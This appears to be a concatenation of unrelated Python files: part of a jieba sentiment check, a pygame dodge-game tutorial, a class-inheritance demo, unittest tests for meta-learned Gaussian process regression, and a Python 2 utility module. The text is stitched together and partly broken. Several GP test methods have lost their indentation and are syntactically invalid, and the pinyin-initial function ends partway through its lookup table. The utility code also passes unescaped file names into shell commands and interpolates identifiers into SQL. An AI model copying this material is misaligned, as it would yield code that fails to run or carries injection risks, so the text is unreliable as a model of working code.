    """Return 1 if any sentiment word occurs in *line* after segmentation.

    NOTE(review): falls through and implicitly returns None (falsy) when
    nothing matches — callers should test the result for truthiness, not
    compare it to 0/1.
    """
    # Register negation words so jieba keeps them as single tokens.
    not_words = [w.strip() for w in open('D:/success/ciku/notDict.txt').readlines()]
    jieba.add_word('百度')
    for word in not_words:
        jieba.add_word(word)
    word_list = jieba.cut(line)
    word_list = [w for w in word_list]
    for word in word_list:
        if word in sentiment_words:
            return 1
|
import pygame

########################################################### (required boilerplate)
pygame.init()  # initialize pygame modules

# Screen size
screen_width= 480
screen_height = 640
screen = pygame.display.set_mode((screen_width,screen_height))  # apply the display mode

# Window title
pygame.display.set_caption("Nado Game")  # set the game window's name

# FPS
clock =pygame.time.Clock()
#########################################################################

# 1. Game setup (background, sprites, coordinates, speed, fonts, ...)

# Load the background image
background = pygame.image.load("C:/testpy/python_ex/pyton_game_background.png")

# Load the player character
character = pygame.image.load("C:/testpy/python_ex/pyton_game_character.png")
character_size = character.get_rect().size  # size of the image
character_width = character_size[0]   # character width
character_height = character_size[1]  # character height
character_x_pos = (screen_width - character_width) /2  # horizontally centered
character_y_pos = screen_height - character_height     # flush with the bottom edge

# Movement delta
to_x=0
to_y=0

# Movement speed
character_speed = 1

# Enemy character
enemy = pygame.image.load("C:/testpy/python_ex/pyton_game_enemy.png")
enemy_size = enemy.get_rect().size  # size of the image
enemy_width = enemy_size[0]   # enemy width
enemy_height = enemy_size[1]  # enemy height
enemy_x_pos = (screen_width - enemy_width) /2    # horizontally centered
enemy_y_pos = (screen_height - enemy_height) /2  # vertically centered

# Movement delta
# NOTE(review): re-initialises to_x/to_y/character_speed already set above.
to_x=0
to_y=0

# Movement speed
character_speed = 1

# Font setup
game_font = pygame.font.Font(None, 40)  # font object (font, size)

# Total play time in seconds
total_time = 10

# Timer start
start_ticks = pygame.time.get_ticks()  # current tick count
#########################################################################

# Event loop: keeps the game window alive until the player quits
running = True  # is the game running?
while running:
    dt = clock.tick(60)  # frames per second for this tick
    # dt is used below so movement speed does not depend on the frame rate.

    # 2. Event handling (keyboard, mouse, ...)
    for event in pygame.event.get():  # which event occurred?
        if event.type == pygame.QUIT:  # window close event
            running=False  # the game is no longer running
        if event.type == pygame.KEYDOWN:  # a key was pressed
            if event.key == pygame.K_LEFT:  # move the character left
                to_x-=character_speed
            elif event.key == pygame.K_RIGHT:  # move right
                to_x+=character_speed
            elif event.key == pygame.K_UP:  # move up
                to_y-=character_speed
            elif event.key == pygame.K_DOWN:  # move down
                to_y+=character_speed
        if event.type == pygame.KEYUP:  # a key was released
            if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:  # stop horizontal motion
                to_x = 0
            if event.key == pygame.K_UP or event.key == pygame.K_DOWN:  # stop vertical motion
                to_y = 0
    ###################################################################################################

    # 3. Update the character position
    character_x_pos+=to_x * dt  # multiplying by dt keeps speed FPS-independent
    character_y_pos+=to_y * dt

    # Horizontal bounds
    if character_x_pos<0:
        character_x_pos=0
    elif character_x_pos> screen_width - character_width:
        character_x_pos= screen_width - character_width

    # Vertical bounds
    if character_y_pos<0:
        character_y_pos=0
    elif character_y_pos>screen_height - character_height:
        character_y_pos=screen_height - character_height
    ######################################################################

    # 4. Collision handling
    # Refresh the rect info used for collision detection
    character_rect = character.get_rect()
    character_rect.left = character_x_pos
    character_rect.top = character_y_pos
    enemy_rect = enemy.get_rect()
    enemy_rect.left = enemy_x_pos
    enemy_rect.top = enemy_y_pos

    # Collision check (message text is Korean for "We collided!")
    if character_rect.colliderect(enemy_rect):
        print("충돌했어요!")
        running = False
    ###############################################################

    # 5. Draw the frame
    # screen.fill((127,127,127))  # fill the screen with a solid colour
    screen.blit(background, (0,0))  # draw the background
    screen.blit(character, (character_x_pos,character_y_pos))  # draw the character
    screen.blit(enemy, (enemy_x_pos, enemy_y_pos))  # draw the enemy

    # Countdown timer display
    # elapsed time, converted from milliseconds to seconds
    elapsed_time = (pygame.time.get_ticks() - start_ticks) /1000
    # arguments: text to render, antialias flag, text colour
    timer = game_font.render(str(int(total_time -elapsed_time)),True,(255,255,255))
    screen.blit(timer,(10,10))

    # End the game once the countdown reaches zero
    if total_time< elapsed_time:
        print("Time Out!")
        running = False
    ######################################################################################

    # 6. Refresh the display (required)
    pygame.display.update()  # redraw the game screen

###########################################################
# 7. Pause before exiting (optional)
pygame.time.delay(2000)  # wait about 2 seconds (unit: ms)
###########################################################

# 8. Shut down pygame (required)
pygame.quit()
###########################################
class Person:
    """Simple holder for a first and last name."""

    def __init__(self, fname, lname):
        self.fname = fname
        self.lname = lname

    def printname(self):
        """Print 'first last' on one line."""
        print(f"{self.fname} {self.lname}")
# Demonstrate the base class.
x = Person("PersonFN", "PersonLN")
x.printname()
class Student(Person):
    """Person subclass demonstrating constructor delegation to the base."""
    def __init__(self, fname, lname):
        # Person.__init__(self, fname, lname)
        # Cooperative form; equivalent to the explicit call above in this
        # single-inheritance hierarchy.
        super().__init__(fname, lname)
# Demonstrate that the subclass inherits printname unchanged.
x = Student("StudentFN", "StudentLN")
x.printname()
import unittest
import numpy as np
from meta_learn.GPR_mll import GPRegressionLearned
from meta_learn.GPR_meta_mll import GPRegressionMetaLearned
from gpytorch.kernels import CosineKernel
import torch
class TestGPR_mll(unittest.TestCase):
    def setUp(self):
        """Build shared 1-D toy datasets: constant 0, constant 2, sinusoid.

        NOTE: the order of the np.random.normal calls matters — the
        fixtures are consumed by seed-sensitive tests below.
        """
        ## --- generate toy data --- #
        torch.manual_seed(22)
        np.random.seed(25)
        # train
        n_train_points = 60
        self.x_train = np.linspace(-2, 2, num=n_train_points)
        # constant targets (0 and 2) with small Gaussian observation noise
        self.y_train_zero = self.x_train * 0 + np.random.normal(scale=0.02, size=self.x_train.shape)
        self.y_train_two = self.x_train * 0 + 2 + np.random.normal(scale=0.02, size=self.x_train.shape)
        # noise-free sinusoid
        self.y_train_sin = np.sin(4* self.x_train)
        # test (slightly wider range than train, so mild extrapolation)
        n_test_points = 80
        self.x_test = np.linspace(-2.1, 2.1, num=n_test_points)
        self.y_test_zero = self.x_test * 0 + np.random.normal(scale=0.02, size=self.x_test.shape)
        self.y_test_two = self.x_test * 0 + 2 + np.random.normal(scale=0.02, size=self.x_test.shape)
        self.y_test_sin = np.sin(4 * self.x_test)
    def test_random_seed_consistency(self):
        """Two learners built with the same random_seed must predict identically.

        NOTE(review): construction and fitting order is kept as-is in case
        model construction consumes global RNG state.
        """
        gpr_model_1 = GPRegressionLearned(self.x_train, self.y_train_two, learning_mode='both',
                                          num_iter_fit=5, mean_module='NN', covar_module='NN', random_seed=22)
        gpr_model_2 = GPRegressionLearned(self.x_train, self.y_train_two, learning_mode='both',
                                          num_iter_fit=5, mean_module='NN', covar_module='NN', random_seed=22)
        gpr_model_1.fit()
        t_predict_1 = gpr_model_1.predict(self.x_test)
        gpr_model_2.fit()
        t_predict_2 = gpr_model_2.predict(self.x_test)
        self.assertTrue(np.array_equal(t_predict_1, t_predict_2))
def test_serializable(self):
torch.manual_seed(40)
np.random.seed(22)
import itertools
# check that more datasets improve performance
for mean_module, covar_module in itertools.product(['constant', 'NN'], ['SE', 'NN']):
gpr_model = GPRegressionLearned(self.x_train, self.y_train_two, learning_mode='both',
num_iter_fit=10, mean_module=mean_module, covar_module='NN', random_seed=22)
gpr_model.fit()
pred_1 = gpr_model.predict(self.x_train)
gpr_model2 = GPRegressionLearned(self.x_train, self.y_train_two, learning_mode='both',
num_iter_fit=1, mean_module=mean_module, covar_module='NN', random_seed=345)
gpr_model2.fit()
pred_2 = gpr_model2.predict(self.x_train)
file = ('/tmp/test_torch_serialization.pkl')
torch.save(gpr_model.state_dict(), file)
gpr_model2.load_state_dict(torch.load(file))
pred_3 = gpr_model2.predict(self.x_train)
assert not np.array_equal(pred_1, pred_2)
assert np.array_equal(pred_1, pred_3)
def test_mean_learning(self):
for mean_module in ['NN']:
gpr_model_vanilla = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='vanilla', num_iter_fit=20,
mean_module='constant', covar_module='SE')
gpr_model_vanilla.fit()
gpr_model_learn_mean = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='learn_mean', num_iter_fit=100,
mean_module=mean_module, covar_module='SE', mean_nn_layers=(16, 16))
gpr_model_learn_mean.fit()
ll_vanilla, rmse_vanilla, _ = gpr_model_vanilla.eval(self.x_train, self.y_train_two)
ll_mean, rmse_mean, _ = gpr_model_learn_mean.eval(self.x_train, self.y_train_sin)
print(ll_mean, ll_vanilla)
print(rmse_mean, rmse_vanilla)
self.assertGreater(ll_mean, ll_vanilla)
self.assertLess(rmse_mean, rmse_vanilla)
def test_kernel_learning_COS(self):
for learning_mode in ['learn_kernel', 'both']:
gpr_model_vanilla = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='vanilla',
num_iter_fit=1,
mean_module='constant', covar_module=CosineKernel())
gpr_model_vanilla.fit()
gpr_model_learn_kernel = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='learn_kernel',
num_iter_fit=500,
mean_module='constant', covar_module=CosineKernel())
print(gpr_model_learn_kernel.model.covar_module.lengthscale)
gpr_model_learn_kernel.fit(valid_x=self.x_train, valid_t=self.y_train_sin)
print(gpr_model_learn_kernel.model.covar_module.lengthscale)
ll_vanilla, rmse_vanilla, _ = gpr_model_vanilla.eval(self.x_train, self.y_train_sin)
ll_kernel, rmse_kernel, _ = gpr_model_learn_kernel.eval(self.x_train, self.y_train_sin)
print('learning_mode', learning_mode)
print(ll_kernel, ll_vanilla)
print(rmse_kernel, rmse_vanilla)
self.assertGreater(ll_kernel, ll_vanilla)
self.assertLess(rmse_kernel, rmse_vanilla)
    def test_kernel_learning_NN(self):
        """Learning an NN kernel should beat a barely-trained baseline on sin data."""
        for learning_mode in ['learn_kernel', 'both']:
            # baseline: same NN kernel but only a single fitting iteration
            gpr_model_vanilla = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='learn_kernel',
                                                    num_iter_fit=1,
                                                    mean_module='zero', covar_module='NN')
            gpr_model_vanilla.fit()
            gpr_model_learn_kernel = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode=learning_mode,
                                                         num_iter_fit=500, mean_module='constant', covar_module='NN',
                                                         kernel_nn_layers=(16, 16), mean_nn_layers=(16, 16))
            gpr_model_learn_kernel.fit(valid_x=self.x_train, valid_t=self.y_train_sin)
            ll_vanilla, rmse_vanilla, _ = gpr_model_vanilla.eval(self.x_train, self.y_train_sin)
            ll_kernel, rmse_kernel, _ = gpr_model_learn_kernel.eval(self.x_train, self.y_train_sin)
            print('learning_mode', learning_mode)
            print(ll_kernel, ll_vanilla)
            print(rmse_kernel, rmse_vanilla)
            self.assertGreater(ll_kernel, ll_vanilla)
            self.assertLess(rmse_kernel, rmse_vanilla)
class TestGPR_mll_meta(unittest.TestCase):
    """Tests for the meta-learned GP (GPRegressionMetaLearned)."""

    def setUp(self):
        # --- generate toy meta-learning data --- #
        torch.manual_seed(22)
        np.random.seed(23)

        # meta-train: several small datasets from the same task distribution
        n_train_datasets = 10
        n_samples_train = 5
        self.train_data_tuples = [sample_data_nonstationary(n_samples_train) for _ in range(n_train_datasets)]

        # meta-test: larger datasets, split into context and validation points
        n_test_datasets = 10
        n_samples_test_context = 5
        n_samples_test = 50
        test_data = [sample_data_nonstationary(n_samples_test_context + n_samples_test) for _ in
                     range(n_test_datasets)]
        self.test_data_tuples = [(x[:n_samples_test_context], t[:n_samples_test_context],
                                  x[n_samples_test_context:], t[n_samples_test_context:]) for (x, t) in test_data]

    def test_random_seed_consistency(self):
        """Identical random_seed must give identical predictions."""
        gp_meta_1 = GPRegressionMetaLearned(self.train_data_tuples[:2], learning_mode='both', num_iter_fit=5,
                                            covar_module='NN', mean_module='NN', random_seed=22)
        gp_meta_2 = GPRegressionMetaLearned(self.train_data_tuples[:2], learning_mode='both', num_iter_fit=5,
                                            covar_module='NN', mean_module='NN', random_seed=22)
        gp_meta_1.meta_fit(valid_tuples=self.test_data_tuples)
        gp_meta_2.meta_fit(valid_tuples=self.test_data_tuples)
        for (x_context, t_context, x_test, _) in self.test_data_tuples[:3]:
            t_predict_1 = gp_meta_1.predict(x_context, t_context, x_test)
            t_predict_2 = gp_meta_2.predict(x_context, t_context, x_test)
            self.assertTrue(np.array_equal(t_predict_1, t_predict_2))

    def test_serializable(self):
        """state_dict round-trip must reproduce predictions exactly.

        Bug fix: covar_module was hard-coded to 'NN' in both constructors, so
        the 'SE' half of the itertools.product loop was never exercised.
        """
        torch.manual_seed(40)
        np.random.seed(22)
        import itertools
        for mean_module, covar_module in itertools.product(['constant', 'NN'], ['SE', 'NN']):
            gpr_model = GPRegressionMetaLearned(self.train_data_tuples[:3], learning_mode='both',
                                                num_iter_fit=5, mean_module=mean_module,
                                                covar_module=covar_module, random_seed=22)
            gpr_model.meta_fit()
            pred_1 = gpr_model.predict(*self.test_data_tuples[0][:3])

            # second model: different seed -> different predictions before loading
            gpr_model2 = GPRegressionMetaLearned(self.train_data_tuples[:3], learning_mode='both',
                                                 num_iter_fit=5, mean_module=mean_module,
                                                 covar_module=covar_module, random_seed=25)
            gpr_model2.meta_fit()
            pred_2 = gpr_model2.predict(*self.test_data_tuples[0][:3])

            file = '/tmp/test_torch_serialization.pkl'
            torch.save(gpr_model.state_dict(), file)
            gpr_model2.load_state_dict(torch.load(file))
            pred_3 = gpr_model2.predict(*self.test_data_tuples[0][:3])

            assert not np.array_equal(pred_1, pred_2)
            assert np.array_equal(pred_1, pred_3)

            # after loading, re-fitting both models under identical seeds must
            # keep them in lockstep
            torch.manual_seed(25)
            gpr_model.rds_numpy = np.random.RandomState(55)
            gpr_model.meta_fit()
            torch.manual_seed(25)
            gpr_model2.rds_numpy = np.random.RandomState(55)
            gpr_model2.meta_fit()
            pred_1 = gpr_model.predict(*self.test_data_tuples[0][:3])
            pred_2 = gpr_model2.predict(*self.test_data_tuples[0][:3])
            assert np.array_equal(pred_1, pred_2)

    def test_mean_learning_more_datasets(self):
        """Meta-training on more datasets should improve test LL and RMSE."""
        torch.manual_seed(40)
        # meta-learning with 2 datasets
        gp_meta = GPRegressionMetaLearned(self.train_data_tuples[:2], learning_mode='both', mean_nn_layers=(16, 16),
                                          kernel_nn_layers=(16, 16), num_iter_fit=3000, covar_module='SE',
                                          mean_module='NN', weight_decay=0.0)
        gp_meta.meta_fit(valid_tuples=self.test_data_tuples)
        test_ll_meta_2, test_rmse_meta_2, _ = gp_meta.eval_datasets(self.test_data_tuples)
        print('Test log-likelihood meta (2 datasets):', test_ll_meta_2)

        # meta-learning with 10 datasets
        gp_meta = GPRegressionMetaLearned(self.train_data_tuples, learning_mode='both', mean_nn_layers=(16, 16),
                                          kernel_nn_layers=(16, 16), num_iter_fit=3000, covar_module='SE',
                                          mean_module='NN', weight_decay=0.0)
        gp_meta.meta_fit(valid_tuples=self.test_data_tuples)
        test_ll_meta_10, test_rmse_meta_10, _ = gp_meta.eval_datasets(self.test_data_tuples)
        print('Test log-likelihood meta (10 datasets):', test_ll_meta_10)

        self.assertGreater(test_ll_meta_10, test_ll_meta_2)
        self.assertLess(test_rmse_meta_10, test_rmse_meta_2)

    def test_normal_vs_meta(self):
        """The meta-learned GP should outperform per-dataset learned GPs."""
        torch.manual_seed(60)
        num_iter_fit = 1000

        gp_meta = GPRegressionMetaLearned(self.train_data_tuples, learning_mode='both', mean_nn_layers=(64, 64),
                                          covar_module='SE', mean_module='NN', weight_decay=0.0, num_iter_fit=num_iter_fit)
        gp_meta.meta_fit(valid_tuples=self.test_data_tuples)
        test_ll_meta, test_rmse_meta, _ = gp_meta.eval_datasets(self.test_data_tuples)
        print('Test log-likelihood meta:', test_ll_meta)

        def fit_eval_gpr(x_context, t_context, x_test, t_test):
            # fit a fresh, non-meta GP on each context set and report its test LL
            gpr = GPRegressionLearned(x_context, t_context, learning_mode='both', mean_nn_layers=(64, 64),
                                      covar_module='SE', mean_module='NN', weight_decay=0.0, num_iter_fit=num_iter_fit)
            gpr.fit(valid_x=x_test, valid_t=t_test)
            return gpr.eval(x_test, t_test)[0]

        ll_list = [fit_eval_gpr(*data_tuple) for data_tuple in self.test_data_tuples]
        test_ll_normal = np.mean(ll_list)
        print('Test log-likelihood normal:', test_ll_normal)
        self.assertGreater(test_ll_meta, test_ll_normal)
""" --- helper functions for data generation ---"""
def sample_data_nonstationary(size=1):
    """Draw *size* points from one randomly-sampled non-stationary 1D function.

    A random slope is drawn first, then uniform inputs in [-5, 5];
    the target is (slope*x + sin((1+|x|)*x)) / 5.
    Returns (X, Y), both of shape (size, 1).
    """
    slope = np.random.normal(loc=1, scale=0.2)

    def target_fn(x):
        frequency = 1 + np.abs(x)
        return (slope * x + np.sin(frequency * x)) / 5

    X = np.random.uniform(-5, 5, size=(size, 1))
    return X, target_fn(X)
# Run the whole suite when executed directly.
if __name__ == '__main__':
    unittest.main()
# -- coding:utf-8 --
import socket,traceback,os,os.path,sys,time,struct,base64,gzip,array,json,zlib,threading
import datetime,uuid
def getmtime(file):
    """Return the last-modification time of *file* (unix timestamp), or 0 on failure.

    Bug fix: narrowed the bare `except:` (which also swallowed
    KeyboardInterrupt/SystemExit) to OSError - the only error
    os.path.getmtime raises for missing/inaccessible paths.
    """
    try:
        return os.path.getmtime(file)
    except OSError:
        return 0
def getfiledigest(file, bufsize=1024*5, type='md5'):
    """Return the hex digest of *file*, read in *bufsize* chunks; '' on error.

    Bug fixes / generalisation:
    - the file handle leaked when read() raised; now closed via try/finally
    - the *type* parameter was accepted but ignored (always md5); it now
      selects any hashlib algorithm, default 'md5' as before
    """
    import hashlib
    m = hashlib.new(type)
    try:
        fp = open(file, 'rb')
        try:
            while True:
                data = fp.read(bufsize)
                if not data:
                    break
                m.update(data)
        finally:
            fp.close()
        return m.hexdigest()
    except Exception:
        traceback.print_exc()
        return ''
def getdigest(d, bufsize=1024*5, type='md5'):
    """Return the MD5 hex digest of buffer *d*, or '' on any error.

    NOTE(review): bufsize/type are accepted but unused - kept only for
    signature symmetry with getfiledigest.
    """
    import hashlib
    try:
        digest = hashlib.md5()
        digest.update(d)
        return digest.hexdigest()
    except:
        return ''
def setmtime(file,tick): # tick - unix timestamp 1970~
    # Set both access and modification time of *file* to the same timestamp.
    os.utime(file,(tick,tick) )
def getdbsequence_pg(dbconn,seqname):
    """Fetch the next value of PostgreSQL sequence *seqname*; 0 on error.

    NOTE(review): seqname is string-interpolated into the SQL - callers
    must pass trusted identifiers only.
    """
    seq = 0
    try:
        sql = "select nextval('%s')"%seqname
        cr = dbconn.cursor()
        cr.execute(sql)
        seq = cr.fetchone()[0]
    except:
        traceback.print_exc()
    return seq
def loadjson(file):
    """Best-effort load of a JSON-ish config file; returns the parsed object or None.

    The content is normalised first (single->double quotes, parens->brackets,
    spaces/tabs stripped) so lightly malformed hand-written files still parse.
    NOTE(review): stripping every space also strips spaces inside string
    values - preserved as-is since existing configs may depend on it.

    Bug fix: the file handle leaked when read() raised; it is now closed
    via try/finally, and the bare except no longer swallows SystemExit.
    """
    d = None
    try:
        fd = open(file)
        try:
            cont = fd.read().strip()
        finally:
            fd.close()
        cont = cont.replace(' ', '')
        cont = cont.replace('\'', "\"")
        cont = cont.replace('\t', "")
        cont = cont.replace('(', "[")
        cont = cont.replace(')', "]")
        d = json.loads(cont)
    except Exception:
        traceback.print_exc()
    return d
def waitForShutdown():
    # Park the calling thread for ~100k seconds (effectively "sleep forever").
    time.sleep(1*10000*10)
def genTempFileName():
    # Current unix time as a string; not collision-proof, adequate for temp names here.
    return str(time.time())
# unix timestamp to datetime.datetime
def mk_datetime(timestamp):
    # Accepts int/float/str; truncates to whole seconds, local timezone.
    timestamp = int(timestamp)
    return datetime.datetime.fromtimestamp(timestamp)
def formatTimestamp(secs):
    """Unix timestamp -> 'YYYY-MM-DD hh:mm:ss' in local time ('' on error)."""
    try:
        d = datetime.datetime.fromtimestamp(secs)
        return "%04d-%02d-%02d %02d:%02d:%02d" % (d.year, d.month, d.day, d.hour, d.minute, d.second)
    except:
        return ''
def formatTimestamp2(secs):
    """Unix timestamp -> 'YYYY.MM.DD hh:mm:ss' in local time ('' on error)."""
    try:
        d = datetime.datetime.fromtimestamp(secs)
        return "%04d.%02d.%02d %02d:%02d:%02d" % (d.year, d.month, d.day, d.hour, d.minute, d.second)
    except:
        traceback.print_exc()
        return ''
def formatTimestamp_ymdhm(secs):
    """Unix timestamp -> 'YYYY-MM-DD hh:mm' (minute precision), '' on error."""
    try:
        d = datetime.datetime.fromtimestamp(secs)
        return "%04d-%02d-%02d %02d:%02d" % (d.year, d.month, d.day, d.hour, d.minute)
    except:
        return ''
def formatDate_ymd(dt):
    """date/datetime -> 'YYYY-MM-DD'; '' on error (e.g. dt is None)."""
    try:
        return "%04d-%02d-%02d" % (dt.year, dt.month, dt.day)
    except:
        return ''
def formatTimeLength(secs):
    """Duration in seconds -> 'hh:mm:ss' string."""
    hours, remainder = divmod(int(secs), 3600)
    minutes, seconds = divmod(remainder, 60)
    return '%02d:%02d:%02d' % (hours, minutes, seconds)
# Build a unix timestamp (seconds since 1970) from a datetime.
def maketimestamp(dt):
    """datetime -> unix timestamp (int, local time); 0 when dt is falsy."""
    if not dt:
        return 0
    return int(time.mktime(dt.timetuple()))
def maketimestamp64(dt):
    """datetime -> unix timestamp in milliseconds."""
    return maketimestamp(dt) * 1000
def currentTimestamp64():
    """Current local time as a millisecond unix timestamp."""
    return maketimestamp64(datetime.datetime.now())
def touchfile(file):
    """Create (or truncate) *file*; True on success, False on any error."""
    try:
        open(file, 'w').close()
    except:
        return False
    return True
def currentDateTimeStr():
    """Now, formatted 'YYYY-MM-DD hh:mm:ss' (second precision, local time)."""
    now = datetime.datetime.now()
    return formatTimestamp(maketimestamp(now))
def getToDayStr():
    """Today as 'YYYYMMDD'."""
    lt = time.localtime()
    return "%04d%02d%02d" % (lt.tm_year, lt.tm_mon, lt.tm_mday)
def getToDayStr2():
    """Today as 'YYYY-MM-DD'."""
    lt = time.localtime()
    return "%04d-%02d-%02d" % (lt.tm_year, lt.tm_mon, lt.tm_mday)
# Helper class for asynchronously waiting on / handing over a result object.
class MutexObject:
    """One-slot handoff: one thread waits for a value, another delivers it."""
    def __init__(self):
        self.mtx = threading.Condition()
        self.d = None  # the handed-over payload; None means "nothing yet"
    def waitObject(self,timeout):
        """Block up to *timeout* seconds for a value; return it (clearing the slot) or None."""
        d = None
        self.mtx.acquire()
        if self.d == None:
            self.mtx.wait(timeout)
        d = self.d
        self.d = None
        self.mtx.release()
        return d
    def notify(self,d):
        """Deliver *d* and wake one waiting thread."""
        self.mtx.acquire()
        self.d = d
        self.mtx.notify()
        self.mtx.release()
def geo_rect2wktpolygon(rc):
    """(x, y, w, h) rectangle -> closed WKT POLYGON ring string."""
    x, y, w, h = rc
    corners = ((x, y), (x + w, y), (x + w, y + h), (x, y + h), (x, y))
    ring = ",".join("%s %s" % corner for corner in corners)
    return "POLYGON((%s))" % ring
def readImageTimes(imagefile,ffmpeg='ffmpeg.exe'):
    """Derive (create_time, last_modify_time) unix timestamps for a media file.

    Runs ffmpeg to read the clip duration and subtracts it from the file's
    mtime. Python 2 only (os.popen3 was removed in Python 3).
    NOTE(review): this name is redefined later in this module; that later
    version ignores the *ffmpeg* argument and returns () instead of (0,0)
    on failure - confirm which one callers expect.
    """
    import re
    rst = () # (creattime,lastmodifytime) timestamp time ticks
    detail = os.popen3('%s -i %s'%(ffmpeg,imagefile) )[2].read()
    tt = re.findall('Duration: (\d{1,2}:\d{1,2}:\d{1,2}\.\d{0,4}),',detail,re.M)
    if tt:
        tt = tt[0]
    else:
        return (0,0)
    # 'hh:mm:ss.ff' -> whole seconds
    h,m,s = map(int, map(float,tt.split(':')) )
    duration_secs = int ( h*3600 + m * 60 + s)
    lastmodify = os.path.getmtime(imagefile)
    createsecs = lastmodify - duration_secs
    return (int(createsecs),int(lastmodify))
def statevfs(path):
    """Windows-only volume stats for *path* via win32api; (0, 0) on any failure.

    NOTE(review): GetDiskFreeSpaceEx returns three values; here the second
    and third are returned as (all, user) - presumably (total bytes,
    total free bytes). Confirm against callers before relying on it.
    """
    import win32api
    import os.path
    path = os.path.normpath(path)
    # GetDiskFreeSpaceEx rejects trailing backslashes on some paths
    if path[-1]=='\\':
        path = path[:-1]
    try:
        f,all,user = win32api.GetDiskFreeSpaceEx(path)
        return all,user
    except:return 0,0
def hashobject(obj):
    """Snapshot every non-dunder attribute of *obj* into a dict (methods included)."""
    return dict((name, getattr(obj, name))
                for name in dir(obj) if not name.startswith('__'))
def hashobject2(obj):
    """Like hashobject, but callables are skipped - data attributes only."""
    snapshot = {}
    for name in dir(obj):
        if name.startswith('__'):
            continue
        value = getattr(obj, name)
        if not callable(value):
            snapshot[name] = value
    return snapshot
MB_SIZE = 1024. * 1024.  # bytes per megabyte (float, so division is exact)

def formatfilesize(size):
    """Byte count -> megabytes, rounded to 3 decimal places."""
    return round(size / MB_SIZE, 3)
def readImageTimes(imagefile,ffmpeg='ffmpeg.exe'):
    """(Redefinition - this later version wins at import time.)

    Same idea as the earlier readImageTimes but normalises the path first.
    NOTE(review): the *ffmpeg* parameter is ignored ('ffmpeg.exe' is
    hard-coded) and the failure value is () rather than (0,0).
    Python 2 only (os.popen3).
    """
    import re
    rst = () # (creattime,lastmodifytime) timestamp time ticks
    imagefile = os.path.normpath(imagefile)
    detail = os.popen3('ffmpeg.exe -i %s'%(imagefile) )[2].read()
    tt = re.findall('Duration: (\d{1,2}:\d{1,2}:\d{1,2}\.\d{0,4}),',detail,re.M)
    if tt:
        tt = tt[0]
    else:
        return ()
    # 'hh:mm:ss.ff' -> whole seconds
    h,m,s = map(int, map(float,tt.split(':')) )
    duration_secs = int ( h*3600 + m * 60 + s)
    lastmodify = os.path.getmtime(imagefile)
    createsecs = lastmodify - duration_secs
    return (int(createsecs),int(lastmodify))
def readImageDuration(imagefile,ffmpeg='ffmpeg.exe'):
    """Return the media duration of *imagefile* in whole seconds (0 if unknown).

    Python 2 / Windows flavoured: os.popen3 plus a gbk-encoded command line
    (for non-ASCII file names). NOTE(review): the *ffmpeg* parameter is
    ignored here as well - 'ffmpeg.exe' is hard-coded.
    """
    import re
    rst = () # (creattime,lastmodifytime) timestamp time ticks
    imagefile = os.path.normpath(imagefile)
    cmd = u'ffmpeg.exe -i %s'%(imagefile)
    detail = os.popen3(cmd.encode('gbk') )[2].read()
    tt = re.findall('Duration: (\d{1,2}:\d{1,2}:\d{1,2}\.\d{0,4}),',detail,re.M)
    if tt:
        tt = tt[0]
    else:
        return 0
    # 'hh:mm:ss.ff' -> whole seconds
    h,m,s = map(int, map(float,tt.split(':')) )
    duration_secs = int ( h*3600 + m * 60 + s)
    return duration_secs
def parseInetAddress(address):
    """Parse 'host:port' into (host, int(port)); empty tuple on malformed input."""
    try:
        host, portstr = address.split(':')
        return host, int(portstr)
    except:
        return ()
class SimpleConfig:
    """Minimal 'key = value' config file reader with '#' comments."""
    def __init__(self):
        self.confile = ''
        self.props = {}
    def load(self, file):
        """Parse *file* into self.props; on any error props resets to {}.

        Rules: blank lines and '#...' lines are skipped, inline '#'
        comments are stripped, and only lines containing exactly one '='
        are kept (keys/values are stripped strings). Returns self so
        calls can be chained.
        """
        try:
            handle = open(file, 'r')
            raw_lines = handle.readlines()
            handle.close()
            self.props = {}
            for raw in raw_lines:
                raw = raw.strip()
                if not raw or raw.startswith('#'):
                    continue
                raw = raw.split('#')[0]
                parts = raw.split('=')
                if len(parts) != 2:
                    continue
                self.props[parts[0].strip()] = parts[1].strip()
        except:
            traceback.print_exc()
            self.props = {}
        return self
    def get(self, key, default=None):
        """Dict-style lookup with default; all stored values are strings."""
        return self.props.get(key, default)
def multi_get_letter(str_input):
    """Transliterate text into the pinyin initial of each character.

    Accepts unicode or utf8/gbk-encoded byte strings (Python 2 semantics).
    Returns the joined initials, or None when the encoding is unknown.
    """
    if isinstance(str_input, unicode):
        unicode_str = str_input
    else:
        # try utf8 first, then fall back to gbk
        try:
            unicode_str = str_input.decode('utf8')
        except:
            try:
                unicode_str = str_input.decode('gbk')
            except:
                print 'unknown coding'
                return
    return_list = []
    for one_unicode in unicode_str:
        #print single_get_first(one_unicode)
        return_list.append(single_get_first(one_unicode))
    return "".join(return_list)
def single_get_first(unicode1):
    """Pinyin initial of a single character.

    Single-byte (ASCII) characters are returned as-is; for two-byte GBK
    characters the signed GB2312 code point is mapped to an initial via
    the classic range table below ('' when outside every range).
    """
    str1 = unicode1.encode('gbk')
    try:
        ord(str1)
        return str1
    except:
        # two-byte char: compute the signed GB2312 code used by the table
        asc = ord(str1[0]) * 256 + ord(str1[1]) - 65536
        if asc >= -20319 and asc <= -20284:
            return 'a'
        if asc >= -20283 and asc <= -19776:
            return 'b'
        if asc >= -19775 and asc <= -19219:
            return 'c'
        if asc >= -19218 and asc <= -18711:
            return 'd'
        if asc >= -18710 and asc <= -18527:
            return 'e'
        if asc >= -18526 and asc <= -18240:
            return 'f'
        if asc >= -18239 and asc <= -17923:
            return 'g'
        if asc >= -17922 and asc <= -17418:
            return 'h'
        if asc >= -17417 and asc <= -16475:
            return 'j'
        if asc >= -16474 and asc <= -16213:
            return 'k'
        if asc >= -16212 and asc <= -15641:
            return 'l'
        if asc >= -15640 and asc <= -15166:
            return 'm'
        if asc >= -15165 and asc <= -14923:
            return 'n'
        if asc >= -14922 and asc <= -14915:
            return 'o'
        if asc >= -14914 and asc <= -14631:
            return 'p'
        if asc >= -14630 and asc <= -14150:
            return 'q'
        if asc >= -14149 and asc <= -14091:
            return 'r'
        if asc >= -14090 and asc <= -13119:
            return 's'
        if asc >= -13118 and asc <= -12839:
            return 't'
